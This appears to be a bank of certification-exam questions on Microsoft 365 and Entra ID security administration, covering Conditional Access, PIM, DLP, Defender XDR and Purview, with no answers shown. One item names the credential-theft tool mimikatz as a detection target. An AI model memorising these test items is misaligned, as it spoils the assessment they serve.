Easy171Your organization's Microsoft Intune environment enforces device compliance policies for iOS devices. You need to ensure that only devices with a passcode that is at least 6 characters and have jailbreak detection enabled are considered compliant. What should you configure?
Medium172A company uses Microsoft Entra ID P2 licenses. They want to require multi-factor authentication (MFA) for all users when accessing the Azure Management portal, but only from devices that are not marked as compliant. Additionally, a group named 'BreakGlass' must be excluded from this requirement. Which Conditional Access policy configuration should be applied?
Medium173Which TWO features in Microsoft Defender for Office 365 help protect against zero-day malware in email attachments?
Easy174A security administrator needs to create an automated investigation and response (AIR) playbook that automatically isolates a device whenever a high-severity alert from Microsoft Defender for Endpoint is generated. The playbook should run without requiring manual approval. Which capability in Microsoft 365 Defender should the administrator configure?
Hard175Match each PowerShell command to its function in Microsoft 365.
Medium176A user in your organization receives a 'Message blocked' notification when trying to send an email with a credit card number. The DLP policy is configured to block such emails. The user claims the credit card number is a valid test number used for training. What should you do to allow the email while maintaining security?
Easy177Your organization has a Microsoft 365 E5 tenant with Microsoft Defender for Cloud Apps. You need to discover and control the use of unsanctioned cloud apps. Which TWO actions should you take? (Choose two.)
Medium178Your organization needs to prevent users from sharing documents containing personally identifiable information (PII) with external users. You have Microsoft Purview Data Loss Prevention (DLP) deployed. What should you configure?
Easy179You are configuring Microsoft Entra ID to allow external users from a partner organization to access a specific SharePoint Online site. You need to ensure that the external users authenticate using their own corporate credentials and are automatically invited when they first access the resource. What should you configure?
Easy180Your organization uses Microsoft Defender for Cloud Apps. You need to generate alerts when a user downloads a large number of files from Microsoft SharePoint Online in a short period. What should you create?
Easy181Your company is implementing Microsoft 365 Copilot for Microsoft 365. You need to ensure that Copilot can access data from across the organization, but only for users who have the appropriate permissions. What is the primary security boundary for Copilot data access?
Easy182Refer to the exhibit. You are reviewing an app registration in Microsoft Entra ID for the Microsoft Teams Admin Center. The permission shown is for another resource. What is the consequence of this permission configuration?
Hard183Which THREE conditions must be met for a tenant-to-tenant migration of SharePoint Online content?
Hard184You are a Microsoft 365 administrator for a company that uses Microsoft Defender XDR. A security analyst needs to view a unified list of incidents and alerts from Microsoft Defender for Endpoint, Microsoft Defender for Office 365, and Microsoft Defender for Identity. Where should the analyst go to see this unified view?
Easy185Match each Microsoft 365 threat scenario to the appropriate protection.
Medium186You manage a Microsoft 365 tenant for a multinational corporation. You need to implement Microsoft Purview Information Protection to automatically classify and protect documents containing credit card numbers. The solution must apply encryption automatically when a document is saved to SharePoint Online. What should you do?
Hard187You are a Microsoft 365 administrator for Contoso Pharmaceuticals, which uses Microsoft Entra ID P2. The company has a partnership with a research firm that needs access to a specific set of SharePoint Online sites and a custom line-of-business application. The partners must authenticate by using their own Microsoft Entra ID credentials. You need to provide access while ensuring that the partners' access is reviewed every quarter and that they can request access through a self-service portal. What should you do?
Hard188You are the Microsoft 365 administrator for a company that uses Microsoft 365 E5. The company has a Microsoft Entra tenant with 10,000 users. You need to ensure that when users sign in to Microsoft 365 from unmanaged devices, they are required to use multi-factor authentication (MFA) and cannot download files from SharePoint Online. Users on managed devices should not be prompted for MFA and should be able to download files. What should you configure?
Hard189An organization wants to configure Self-Service Password Reset (SSPR) for all users. The administrator must ensure that users register two authentication methods: one from the mobile app category (e.g., notification or code) and one from the phone call category (e.g., office phone or mobile phone). Which combination of methods should the administrator select in the SSPR settings?
Medium190A compliance officer needs to automatically apply a sensitivity label that encrypts documents in SharePoint Online when the documents contain a custom regex pattern (e.g., employee ID). The labeling must occur automatically without requiring user interaction. Which two Microsoft Purview components must be configured? (Select the option that correctly identifies both components.)
Medium191Your organization uses Microsoft Defender for Cloud Apps. You want to set up a policy that automatically suspends a user if they download more than 100 files from SharePoint Online within 10 minutes. Which type of policy should you create?
Hard192A compliance officer needs to monitor employee communications across Microsoft Teams and Outlook for potential insider trading, using predefined policies. The solution must detect keywords like 'insider tip' and 'stock' and allow designated reviewers to take action. Which Microsoft Purview solution should the officer use?
Medium193A company has a hybrid identity with password hash synchronization. They want to ensure that any user whose account is disabled in on-premises Active Directory is automatically prevented from signing in to Microsoft 365. How can this be achieved?
Medium194Your organization uses Microsoft Defender for Cloud Apps. You want to detect when a user accesses a sanctioned cloud app from an anonymous IP address. What should you configure?
Easy195You manage a Microsoft 365 E5 tenant with Microsoft Entra ID P2. The security team wants to ensure that when a user is assigned the Global Administrator role, the assignment is time-bound, requires approval, and requires multifactor authentication for activation. You need to configure Privileged Identity Management (PIM). Which setting should you configure?
Hard196Your organization uses Microsoft Entra ID and has a Conditional Access policy that requires MFA for all external users. However, guest users from a partner organization are being blocked when they try to access a SharePoint Online site. You need to ensure that guest users can access the site without being prompted for MFA if they have already satisfied MFA in their home tenant. What should you configure?
Medium197As a Microsoft 365 administrator, you need to ensure that sensitive data is not shared externally via email. You configure Data Loss Prevention (DLP) policies in Microsoft Purview. What is the primary purpose of a DLP policy?
Easy198Which THREE of the following are valid permissions in Microsoft Entra ID custom roles? (Choose three.)
Hard199Your organization uses Microsoft Entra ID P2 licenses. You need to configure a Conditional Access policy that requires phishing-resistant multifactor authentication (MFA) for all users accessing sensitive applications. Which authentication strength should you select in the policy?
Medium200Your organization is implementing a zero-trust security model. Which TWO Microsoft Entra ID features should you enable to enforce least-privilege access and continuous verification?
Medium201A company (Contoso) frequently collaborates with a partner company (Fabrikam) via B2B collaboration. Contoso wants to require Fabrikam's guest users to perform MFA using Contoso's MFA policies, ignoring any MFA claims from the Fabrikam home tenant. However, Fabrikam's users already have MFA enabled in their home tenant. What should Contoso configure in their cross-tenant access settings?
Hard202A company experiences a ransomware attack that encrypts files on several endpoints. The security team wants to use automated investigation and response (AIR) capabilities in Microsoft Defender XDR to contain the threat. Which TWO actions can be taken automatically by AIR? (Select TWO.)
Hard203Your Microsoft 365 tenant contains sensitive financial data that must be retained for 7 years. You configure a retention policy in Microsoft Purview compliance portal. After 7 years, the data is still accessible to users. What is the most likely reason?
Hard204You need to ensure that only users from your organization can access a SharePoint Online site. Which setting should you configure?
Easy205A security analyst wants to create a custom detection rule that triggers when a device communicates with a new, unclassified IP address that has been flagged by Microsoft threat intelligence as potentially malicious. The rule should run every hour and create an incident if more than 5 such communications from the same device occur within a 24-hour window. Which advanced hunting tables should be joined in the KQL query for this rule?
Hard206A company wants to implement just-in-time (JIT) privileged access for the Security Administrator role. Users must be able to activate the role with a business justification, and the activation must be approved by a designated group of approvers. The role activation should expire after 4 hours. Which Privileged Identity Management (PIM) configuration should the administrator modify?
Medium207A security analyst wants to create a custom detection rule in Microsoft Defender XDR that triggers when a device establishes a network connection to an IP address that has been recently observed in threat intelligence feeds as a new, malicious command-and-control server. The rule should analyze network communication events. Which advanced hunting table should be the primary data source for the Kusto Query Language (KQL) query?
Medium208You are reviewing a conditional access policy in Microsoft Entra ID as shown in the exhibit. The policy is intended to block sign-ins that are considered risky. However, some high-risk users are still able to sign in. What is the most likely reason?
Medium209A company uses Microsoft Entra ID with Pass-through Authentication. The security team wants to block all sign-ins from countries that are not approved (e.g., high-risk regions). Which feature should they use?
Medium210A company uses Microsoft Entra ID with password hash synchronization. The security team wants to prevent users from setting passwords that include their username or common terms from a custom dictionary (e.g., company name, product names). Which feature should be configured?
Medium211A security administrator wants to prevent users from uploading files to unsanctioned cloud storage apps (e.g., personal Dropbox or Google Drive) from managed Windows devices. The solution must use a reverse proxy to control file uploads in real time. Which Microsoft Defender for Cloud Apps feature should the administrator configure?
Hard212You are the administrator for a Microsoft 365 tenant. Users report that they cannot sign in to Microsoft Entra ID because their accounts are locked after multiple failed password attempts. You need to reduce the number of lockouts caused by users forgetting their passwords and to allow users to unlock their own accounts without calling the help desk. What should you do?
Easy213A new employee has been hired and their account already exists in the on-premises Active Directory. The administrator needs to provide the employee with access to Microsoft 365 services as quickly as possible. What is the most efficient way to enable the user?
Easy214You are planning the initial deployment of a new Microsoft 365 tenant for Contoso Ltd. Which three of the following actions are required or recommended as part of the tenant provisioning and initial configuration process? (Choose three.)
Medium215A company wants to use Microsoft Defender XDR to automatically investigate and remediate threats across email, endpoints, and identities. Which role is required to configure automation settings in the Microsoft 365 Defender portal?
Easy216You are the identity administrator for a Microsoft 365 E5 tenant. The security team wants to enforce Microsoft Entra multifactor authentication (MFA) for all users when they access Microsoft 365 apps from outside the corporate network, but allow seamless access from the corporate office IP range 203.0.113.0/24. You create a Conditional Access policy named 'Require MFA offsite'. Which configuration should you use to meet the requirement?
Medium217Your organization uses Microsoft Defender for Identity (MDI) and Microsoft Defender for Cloud Apps. You receive an alert about a user who is performing an unusual number of failed logon attempts from a non-corporate IP address. The user is a member of the Finance group. What is the recommended first step?
Hard218You are the Microsoft 365 administrator for a company that uses Microsoft Entra ID P2. The security team wants to require members of the 'Finance' group to use multifactor authentication (MFA) when they access any cloud app from outside the corporate network. You create a Conditional Access policy and assign it to the Finance group. You need to configure the policy to meet the requirement while minimizing impact on other users. What should you do?
Medium219A compliance officer needs to preserve all communications (email and Teams messages) for employees in the legal department for a minimum of 7 years. Additionally, any deletion (by users or system) must be blocked, and after the retention period, the items must be disposed of automatically. The solution must also ensure that the communications are marked as 'records' to prevent tampering. Which Microsoft Purview solution should the officer configure?
Hard220A company needs to ensure that only users from specific IP ranges can access Exchange Online. Which tool should be used?
Easy221You are the identity administrator for a Microsoft 365 E5 tenant. The company uses Microsoft Entra ID P2. The security team wants to implement just-in-time role activation for the 'Security Administrator' role. They want to ensure that when a user activates the role, they must provide a justification and approve via multi-factor authentication. They also want the activation to last for a maximum of 4 hours. You configure Privileged Identity Management (PIM). Which setting should you configure to meet the requirement for justification and MFA?
Hard222You are implementing Microsoft Entra Verified ID to issue verifiable credentials to employees for proof of employment. Which component is required to issue and verify credentials?
Easy223A ransomware alert is confirmed in Microsoft Defender XDR on a user device that is still communicating with other endpoints. What should the administrator do first to reduce spread while preserving the ability to investigate?
Hard224Your organization uses Microsoft 365 Defender. You need to configure automated investigation and response (AIR) to automatically remediate high-confidence phishing emails. What should you configure?
Medium225You are a security administrator for a company that uses Microsoft Defender XDR. You need to create a custom detection rule that triggers when a process named 'mimikatz.exe' is executed on any device. The rule should run every hour and generate an alert. Which of the following should you use to create this rule?
Medium226An organization has just signed up for Microsoft 365 E3 with the initial domain 'contoso.onmicrosoft.com'. They need to create the first user accounts. What will be the default email address format for these new users if no custom domain is added yet?
Easy227Your organization uses Microsoft Entra ID. You need to enable users to securely share documents with external partners. Which TWO features should you use?
Easy228Which TWO are prerequisites for implementing Microsoft Entra ID Identity Protection? (Choose two.)
Easy229Your organization uses Microsoft Defender for Office 365 and wants to simulate a phishing attack to train users. You need to configure a simulation that uses a URL link to a credential harvesting page. Which feature should you use?
Medium230A security administrator is configuring Microsoft Defender for Cloud Apps. The administrator needs to discover which cloud apps are being used in the organization and then block usage of unsanctioned apps in real time using a reverse proxy. Which two Defender for Cloud Apps features must be configured? (Select the two correct options.)
Hard231You run the Azure CLI command shown in the exhibit. What does the output represent?
Easy232A security administrator needs to view a unified incident queue that correlates alerts from Microsoft Defender for Endpoint, Microsoft Defender for Office 365, and Microsoft Defender for Identity. Which console should the administrator open?
Easy233Which TWO actions are required to enable Microsoft 365 Copilot for all users in your tenant?
Medium234Your organization uses Microsoft Defender for Cloud Apps. You need to be alerted when a user accesses a cloud app from a risky IP address. What should you configure?
Easy235You are implementing Microsoft Entra Identity Protection. You need to configure automated responses to medium and high user risk. Which policy should you create?
Hard236Your organization uses Microsoft Defender for Endpoint and Microsoft Defender for Identity. A user reports that their account was used to send a large volume of email messages to internal recipients, which appears to be a potential account compromise. You need to determine if the account is compromised and if any lateral movement occurred. Which data sources should you analyze in Microsoft Defender XDR?
Hard237An organization has multiple Microsoft Entra ID tenants and wants to allow partner users to access internal applications using their own corporate credentials. Which feature should be used to enable this?
Hard238A user reports they cannot access SharePoint Online but can access Outlook. The admin verifies the user has an E3 license assigned. What is the most likely cause?
Easy239A company's security team needs to investigate a suspicious email that was reported by a user. The email was not blocked by Exchange Online Protection (EOP) and was delivered to the user's inbox. The security team wants to use Microsoft Defender XDR to analyze the email and its attachments. Which feature should they use to submit the email for automated investigation?
Medium240Your organization has a Microsoft 365 tenant with 10,000 users. You are configuring Microsoft Entra ID Identity Protection to detect risky sign-ins. You need to ensure that when a sign-in risk level of 'High' is detected, the user is blocked from signing in and an administrator is notified. What should you configure?
Hard241You are the Microsoft 365 administrator for a company with a hybrid identity configuration using Azure AD Connect. The company has a custom domain 'contoso.com' federated with Active Directory Federation Services (ADFS). All users are synced from on-premises Active Directory. The security team wants to implement Microsoft Entra ID Protection to detect risky sign-ins. However, they are concerned that federated authentication bypasses some risk detection capabilities. You need to ensure that Microsoft Entra ID Protection can evaluate risk for all sign-ins, including federated ones. What should you do?
Hard242You are the Microsoft 365 administrator for a company that uses Microsoft 365 E5. The company has a hybrid deployment with Exchange Server 2019 on-premises and Exchange Online. You need to configure a mail flow rule that adds a disclaimer to all emails sent from on-premises mailboxes to external recipients. The disclaimer must be applied only to messages that originate from on-premises and are sent to external domains. What should you do?
Hard243You are a security administrator for a company that uses Microsoft Defender XDR. You need to generate a report that shows the number of incidents closed as true positive, false positive, and benign in the last 30 days. You want to use built-in features without writing custom queries. What should you do?
Easy244Your company is implementing Microsoft Entra Conditional Access. You need to require multifactor authentication (MFA) for all users except those accessing from the corporate office. Which TWO components do you need?
Medium245You are the Microsoft 365 administrator for a company that has a Microsoft 365 E3 tenant. The company wants to ensure that users can only access Microsoft 365 services from compliant devices. You need to configure a policy that enforces this requirement. What should you create?
Easy246Your organization uses Microsoft Defender for Office 365. A user reports receiving a phishing email that bypassed the built-in anti-phishing policy. You need to analyze the email headers to determine why it was not detected. What should you use?
Easy247Your organization, Contoso Ltd., has a Microsoft 365 E5 tenant with Microsoft Entra ID P2. You have 10,000 users and 500 applications. You are planning to implement a comprehensive identity security strategy. Your requirements are: 1. All users must use phishing-resistant MFA for accessing business-critical applications. 2. Users accessing sensitive HR data must be required to use a compliant device. 3. Any authentication attempt from an anonymous IP address or from a country where Contoso has no business operations must be blocked. 4. All external collaboration must be governed by access reviews that require sponsor approval. 5. You need to monitor and respond to identity risks in real time. You need to design a solution using Microsoft Entra ID features. Which combination of features should you implement?
Hard248Your organization uses Microsoft 365 Business Premium. You need to ensure that when a user is assigned an Intune license, the device automatically enrolls in Microsoft Intune. What should you configure?
Easy249You are designing a Microsoft 365 tenant for a multinational organization. You need to ensure compliance with data residency requirements. Which THREE actions should you take?
Hard250A user reports that they cannot access their Microsoft 365 mailbox via Outlook on the web. Other users can access their mailboxes. What is the most likely cause?
Easy251Which THREE features are included in Microsoft Defender for Office 365 Plan 2 but NOT in Plan 1? (Choose three.)
Hard252A company wants to require MFA for all users when they access Office 365 from any network location that is not the company's trusted IP ranges. Which Conditional Access policy configuration should be applied?
Medium253Your organization uses Microsoft 365 and has strict compliance requirements. The compliance officer has noticed that some users are able to access sensitive documents from unmanaged devices. You need to ensure that all access to sensitive data from unmanaged devices is blocked, while still allowing access from managed devices. The solution must be implemented using Microsoft Entra ID and Microsoft Intune. You have already deployed Microsoft Intune for mobile device management. What should you do?
Medium254A company uses Azure AD Connect with password hash synchronization. They want to allow users to reset their on-premises Active Directory passwords from the cloud Self-Service Password Reset (SSPR) portal. Which additional configuration is required in Azure AD Connect?
Medium255A security analyst runs the above KQL query in Microsoft 365 Defender. The query returns an empty result set. Which is the most likely reason?
Medium256Your organization uses Microsoft Defender for Cloud Apps. You need to create a policy that detects when a user shares a file containing sensitive data with an external domain. Which three components must you configure in the policy? (Choose three.)
Hard257A security administrator wants to prevent Microsoft Office applications (Word, Excel, PowerPoint) from creating child processes, which is a common technique used by malware to execute malicious code. Which attack surface reduction (ASR) rule should be enabled?
Medium258You are a security administrator for a company that uses Microsoft Defender XDR. The security team wants to identify all devices that have communicated with a specific malicious IP address over the past 30 days. They need to run an advanced hunting query. Which table should they query?
Hard259Your organization uses Microsoft 365 E5 licenses. You need to implement a secure score improvement plan. After reviewing the Secure Score, you notice a recommendation to 'Enable sign-in risk policy' in Microsoft Entra ID. However, you want to ensure that users who sign in from trusted locations are not challenged. What should you configure?
Hard260Your organization has a Microsoft 365 tenant configured with a custom domain. You need to verify domain ownership using a TXT record. Where in the Microsoft 365 admin center would you initiate this process?
Medium261A company uses Microsoft Entra ID P2 licenses and wants to block all authentication attempts from an internal legacy application that uses POP3 and SMTP protocols. The application cannot be updated and must be blocked from accessing Exchange Online. Which Conditional Access policy setting should the administrator configure?
Medium262A security analyst is creating a custom detection rule in Microsoft 365 Defender Advanced Hunting. The rule should trigger when a user receives a phishing email containing a malicious URL and then clicks that URL within 10 minutes. Which two Advanced Hunting tables must be joined in the KQL query?
Medium263Your organization uses Microsoft Entra ID and has a custom role that grants 'microsoft.directory/applications/credentials/update' permission. A security audit reveals that a user assigned this role has modified credentials for an application. You need to prevent such actions while allowing other application updates. What should you do?
Hard264Match each Microsoft 365 Defender portal component to its function.
Medium265You are a security administrator for a company that uses Microsoft Defender XDR. You need to configure automated investigation and response (AIR) in Microsoft Defender for Endpoint to automatically remediate threats. You want to ensure that when a high-severity alert is triggered, the device is isolated and the malicious file is quarantined without manual intervention. Which setting should you configure?
Hard266An administrator wants to verify ownership of a custom domain 'adatum.com' in their Microsoft 365 tenant. They have already added the domain and received the TXT record value. However, the administrator's DNS hosting provider does not support adding a TXT record. Which alternative record type can be used for domain verification?
Easy267An organization plans to automatically assign Microsoft 365 E3 licenses to all users in the 'Finance' department. The Finance department is identified by the 'Department' attribute in Azure AD. Which method should the administrator use to minimize manual effort?
Medium268Your organization, Fabrikam Inc., uses Microsoft Purview Data Loss Prevention (DLP) to protect sensitive data in Microsoft Teams. You have a DLP policy that blocks sharing of credit card numbers in Teams messages. Recently, users have reported that they cannot share legitimate credit card numbers for business purposes, even with customers. You need to allow users to override the block for legitimate sharing, but require them to provide a business justification. What should you configure?
Hard269A security analyst has identified a new malware sample with SHA256 hash 'abc123...'. They need to immediately block this file from executing on any managed endpoint across the organization. Which Microsoft Defender for Endpoint capability should they use?
Hard270You have a Microsoft 365 E5 tenant. Users report that they cannot access the Microsoft 365 admin center (https://admin.microsoft.com). You verify that they have the Global Administrator role assigned. You check the sign-in logs in Microsoft Entra ID and see that the sign-in was blocked by a Conditional Access policy. The policy requires MFA and a compliant device. The users are using personal devices that are not enrolled. What should you do to allow access while maintaining security?
Medium271Your company uses Microsoft Intune for mobile device management. You need to ensure that only compliant devices can access corporate email in Microsoft 365. Which Microsoft Entra ID feature should you combine with Intune compliance policies?
Medium272Your company uses Microsoft Entra ID. You need to ensure that when users are assigned privileged roles, they must activate the role and provide a justification. The solution must minimize the number of standing assignments. What should you implement?
Easy273A company uses Microsoft Entra ID P2 licenses and wants to implement just-in-time (JIT) privileged access for administrators. Security requirements state that Global Administrator role members must request approval and provide a business justification before their role activation expires after 4 hours. Which Microsoft Entra feature should be configured?
Hard274You are a Microsoft 365 administrator for a small business with 50 users. The company uses Microsoft 365 Business Premium. You need to ensure that all users have multi-factor authentication (MFA) enabled. The company does not have any custom conditional access policies. You want to implement MFA as quickly as possible with minimal configuration. What should you do?
Easy275A company plans to enable Self-Service Password Reset (SSPR) for all users. The administrator must ensure that users are required to register at least two authentication methods: one from the 'mobile app' category and one from the 'phone call' category. Which combination of methods should the administrator select in the SSPR registration settings?
Medium276You are the Microsoft 365 administrator for a company that has a Microsoft 365 E5 tenant. The security team requires that all administrative actions performed in the Microsoft 365 admin center and Microsoft Entra admin center be retained for seven years. You need to configure the appropriate audit log retention. What should you do?
Medium277Your company has deployed Microsoft Defender for Endpoint on all Windows devices. You are investigating an alert for a suspicious PowerShell command that was blocked by Attack Surface Reduction (ASR) rules. The alert shows the command was executed from a script embedded in a Word document. You need to identify the ASR rule that blocked this activity. Which rule is most likely responsible?
Hard278Your organization uses Microsoft 365 E5 licenses for all users. You need to configure role-based access control (RBAC) so that helpdesk staff can reset passwords and manage licenses, but cannot modify user principal names (UPNs) or delete users. Which role assignment should you use?
Medium279A compliance officer needs to prevent users from sending emails that contain social security numbers to external recipients. When a user attempts to send such an email from Outlook, the email should be blocked and a policy tip should be displayed explaining why the email was blocked. Which Microsoft Purview solution should the officer configure?
Medium280A user reports they cannot access Microsoft Teams. They see a message: 'Your account is not enabled for Teams.' You verify the user has a valid Microsoft 365 E3 license assigned. What is the most likely cause?
Easy281Your organization recently deployed Microsoft Defender for Office 365. Users report that some legitimate external emails are being quarantined as phishing attempts. You need to reduce false positives without compromising security. What should you do?
Medium282You are a compliance administrator for Fabrikam Inc. The company uses Microsoft Purview Information Barriers. You need to prevent users in the Sales department from communicating with users in the Research department in Microsoft Teams. However, both departments must be able to communicate with the Legal department. What should you do first?
Medium283Your organization uses Microsoft Entra ID P2 and Microsoft Defender for Cloud Apps. You need to protect a custom SaaS application that uses SAML-based SSO. The application does not support Conditional Access. You want to enforce session controls such as blocking downloads of sensitive files. What should you implement?
Hard284You are a compliance administrator. You need to search for emails that contain trade secrets sent by a specific user in the last month. The search must include all mailboxes. What should you use?
Easy285Drag and drop the steps to deploy Microsoft Defender for Office 365 policies in the correct order.
Medium286Your organization uses Microsoft Sentinel for security operations. You need to ensure that Sentinel can ingest logs from Microsoft 365 Defender (XDR) and Microsoft Entra ID. Which THREE data connectors should you enable? (Choose three.)
Hard287Your company uses Microsoft Defender XDR and Microsoft Defender for Cloud Apps. You have discovered that a user's credentials were compromised and used to access a SaaS application from an unusual location. You need to automatically suspend the user's access to all cloud apps and require a password reset. The suspension should be immediate upon detection. What should you do?
Hard288You are a security administrator for Northwind Traders. You use Microsoft Defender XDR. You need to identify all devices that have communicated with a specific IP address associated with a known threat in the last 30 days. You want to use advanced hunting to find this information. Which table should you query?
Medium289You are troubleshooting why a user cannot access a SharePoint Online site. The user is assigned a Conditional Access policy that requires compliant device, and the device is enrolled in Microsoft Intune but shows as non-compliant. What is the most likely cause?
Hard290A compliance officer needs to identify documents in SharePoint Online that contain confidential business information by using a machine learning model. Which Microsoft Purview solution should be configured?
Easy291You need to grant a vendor access to a specific SharePoint Online site for a limited time. The vendor does not have an account in your Microsoft Entra ID. What should you use?
Easy292Your organization is deploying Microsoft 365 and needs to ensure that all new users are automatically assigned a Microsoft 365 Business Basic license. You want to use a group-based licensing strategy with an Azure AD security group. What should you do first?
Medium293A compliance officer needs to automatically apply a sensitivity label named 'Confidential' to documents stored in SharePoint Online whenever the documents contain social security numbers. Users must be prevented from removing the label. Which configuration should the officer implement?
Medium294A newly hired administrator needs to manage user accounts, licenses, and reset passwords. Which portal should they access?
Easy295Your company uses Microsoft Entra ID and has enabled Microsoft Entra ID Protection. You notice that a user's sign-in was blocked due to a medium user risk. However, the user claims the sign-in was legitimate. What should you do to allow future sign-ins without lowering security?
Hard296Your company is deploying Microsoft 365 Copilot for all users. You need to ensure that Copilot responses are grounded only in organizational data that users already have permission to access. Additionally, you must comply with data residency requirements in the European Union. Which THREE actions should you take?
Hard297A security administrator needs to block users from running portable executable files (e.g., .exe, .scr) that were downloaded from the internet on Windows devices. Which Attack Surface Reduction (ASR) rule should the administrator enable to meet this requirement?
Hard298An organization wants to receive email notifications for all service health incidents. Which role must an administrator have to configure service health notifications in the Microsoft 365 admin center?
Easy299Your organization uses Microsoft Entra ID with P2 licenses. You need to identify and remediate users who are at risk due to leaked credentials or anomalous sign-in activity. You want to automate the response to high-risk users by requiring a password change. Which feature should you use?
Hard300Refer to the exhibit. You run the Get-RetentionCompliancePolicy cmdlet and see the output. Your organization wants to retain all ProjectX documents for 10 years and then allow users to delete them. However, users complain that documents are being deleted automatically. What is the issue?
Medium301Your organization needs to implement a Microsoft Purview data classification solution that scans data in Microsoft 365, Azure SQL Database, and Amazon S3. Which Microsoft Purview feature should you use?
Easy302A security analyst needs to create a custom detection rule in Microsoft Defender XDR that triggers when a device communicates with a new, unclassified IP address flagged by Microsoft threat intelligence as potentially malicious. The rule must run every hour and create an incident if the count of such communications exceeds 10 in a 24-hour window. Which type of rule should the analyst create?
Hard303Your organization uses Microsoft Entra Connect Sync. You need to ensure that specific on-premises Active Directory groups are synchronized to Microsoft Entra ID. What should you configure?
Medium304Your company is implementing Microsoft Purview Information Protection to classify and protect sensitive documents. You need to ensure that all documents containing personally identifiable information (PII) are automatically labeled. Which TWO actions should you take? (Select TWO.)
Medium305A user receives an email from an unknown sender with a .zip attachment. The attachment contains a potentially malicious executable file. Microsoft Defender for Office 365 is enabled. Which feature dynamically detonates the attachment in a sandbox environment and blocks it if malicious behavior is detected?
Easy306A compliance officer needs to automatically retain documents in a SharePoint Online document library for 7 years and then automatically delete them. The retention must be applied based on when the document is created. Which Microsoft Purview feature should be configured?
Medium307You are hunting for malicious activity in Microsoft 365 Defender. The exhibit shows a KQL query. What is the query searching for?
Hard308A security analyst is creating a custom detection rule in Microsoft 365 Defender Advanced Hunting. The rule should trigger when a device makes an outbound connection to a known malicious IP address, and within 10 minutes, a process with suspicious command-line arguments is started on the same device. Which two Advanced Hunting tables must be joined using a KQL query to create this detection?
Medium309Your company uses Microsoft Entra ID. You need to restrict access to a critical application to only users who are in a specific security group and are signing in from a trusted location. You configure a conditional access policy with the following conditions: users (the security group), cloud apps (the critical application), conditions (locations: trusted IP ranges). However, users in the security group are still able to access the app from untrusted locations. What is the most likely reason?
Medium310Your organization uses Microsoft 365 and wants to implement a passwordless authentication strategy. Which THREE methods are supported natively in Microsoft Entra ID for passwordless sign-in?
Medium311A security administrator wants to review email messages that were blocked due to a malware detection in Microsoft Defender for Office 365. Which report should they use?
Easy312Your organization is implementing Microsoft Defender for Cloud Apps. You need to configure anomaly detection policies to alert when a user downloads an unusually large number of files from SharePoint Online. Which data source should you connect to enable this detection?
Hard313Your organization receives a data subject request (DSR) to export personal data of a user. Which Microsoft Purview solution should you use to search for and export the data?
Medium314You are the Microsoft 365 administrator for a company that uses Microsoft 365 E5. The company has a Microsoft Entra tenant with hybrid identity synchronized from on-premises Active Directory using Microsoft Entra Connect. You need to implement self-service password reset (SSPR) so that users can reset their passwords from the Azure portal. The solution must ensure that password changes are written back to on-premises Active Directory. Which two actions should you perform? (Choose two.)
Hard315You are configuring a Microsoft Entra Conditional Access policy to require compliant devices for access to Microsoft 365 apps. You need to ensure that the policy applies to all users except those in the 'BreakGlass' group. The BreakGlass group contains emergency access accounts. What should you do?
Hard316Which TWO components are part of Microsoft Defender XDR?
Hard317A compliance officer needs to ensure that all documents containing a custom sensitive info type (Employee ID with pattern EMP-####) are automatically labeled with a retention label that retains the documents for 3 years. Which two Microsoft Purview components must be configured? (Choose two.)
Hard318The legal department is investigating a potential data breach involving a specific user. The compliance officer needs to place a hold on all content in the user's Exchange Online mailbox and OneDrive for Business to prevent deletion until the investigation is complete. Which Microsoft Purview solution should the officer use?
Medium319You are implementing Microsoft Entra Verified ID. Which identity verification method uses a decentralized identity standard?
Easy320Your organization uses Microsoft Purview Compliance Manager to manage compliance activities. Which TWO actions can be performed directly from Compliance Manager?
Medium321Your organization uses Microsoft Defender for Identity. You receive an alert about a suspicious LDAP query from a domain controller. After investigating, you determine the query is legitimate. How should you prevent future alerts for this activity?
Medium322You need to integrate Microsoft Defender XDR with Microsoft Sentinel for centralized monitoring. Which data connector should you use?
Easy323You are the security administrator for a multinational organization using Microsoft 365 E5. The organization has 10,000 users across three regions: North America, Europe, and Asia. You have deployed Microsoft Defender for Endpoint on all Windows devices and enabled Microsoft Defender for Office 365. Recently, a sophisticated phishing campaign targeted executives in Europe, using a custom domain that closely resembles your legitimate domain (e.g., contoso.com vs. contos0.com). The emails bypassed anti-spam and anti-phishing policies. You need to configure protection to block these impersonation attempts without affecting legitimate emails from the actual domain. You must also ensure that any similar future attempts using different variations are automatically detected. What should you do?
Hard324A company has a Microsoft 365 tenant with domain contoso.com. They own an additional domain fabrikam.com and have already added and verified it with a TXT record. Now they need to configure email to be routed to Exchange Online for fabrikam.com. Which DNS record must they create?
Medium325A global administrator wants to track service health issues and configure notifications for service incidents. Which portal should they use to view the current health status and set up email notifications?
Easy326Your organization uses Microsoft Entra ID P2 licensing. You need to ensure that when a user's risk level is detected as 'high' by Identity Protection, the user is automatically required to perform a password change during their next sign-in. Which conditional access policy configuration should you use?
Medium327Your organization uses Microsoft Entra ID to manage user identities. You need to ensure that users can sign in using their existing social media accounts, such as Google or Facebook. Which identity solution should you configure?
Easy328A company has a Microsoft 365 E5 subscription. The security team requires that all guest users must have terms of use acceptance before accessing resources. Which Azure AD feature should be configured?
Medium329Your organization uses Microsoft Entra ID and has a hybrid identity configuration with Active Directory Federation Services (AD FS). You are migrating to cloud authentication using Pass-through Authentication (PTA). Which TWO components are required for a PTA deployment?
Hard330Your company is implementing Microsoft Purview Audit (Standard). You need to search for activities performed by a specific user in Exchange Online. Which log should you query?
Easy331Match each Microsoft 365 compliance feature to its purpose.
Medium332Your organization has deployed Microsoft Defender for Cloud Apps. You need to ensure that all external file sharing to untrusted domains is automatically blocked. The solution must not affect internal sharing. What should you configure?
Hard333Your organization has a hybrid identity setup with Azure AD Connect. You need to ensure that users can reset their passwords from the cloud and have the changes synchronized back to on-premises Active Directory. Which feature must you enable?
Hard334You are designing a Microsoft Entra ID governance strategy. Which THREE features should you use to implement the principle of least privilege for administrative roles?
Hard335Refer to the exhibit. You have a Conditional Access policy as shown. The exhibit shows the policy is in Report-only mode and that Microsoft Azure Management is included as the target cloud app. A Global Administrator reports that they are not prompted for MFA when accessing the Azure portal. Which is the most likely reason?
Medium336Your organization needs to create a custom domain in Microsoft 365. You have added the domain 'contoso.com' to the tenant. What is the next step to verify domain ownership?
Easy337You are reviewing an ARM template that will be used to deploy a storage account for a Microsoft 365 migration project. The template includes 'supportsHttpsTrafficOnly': true. What is the primary benefit of this setting?
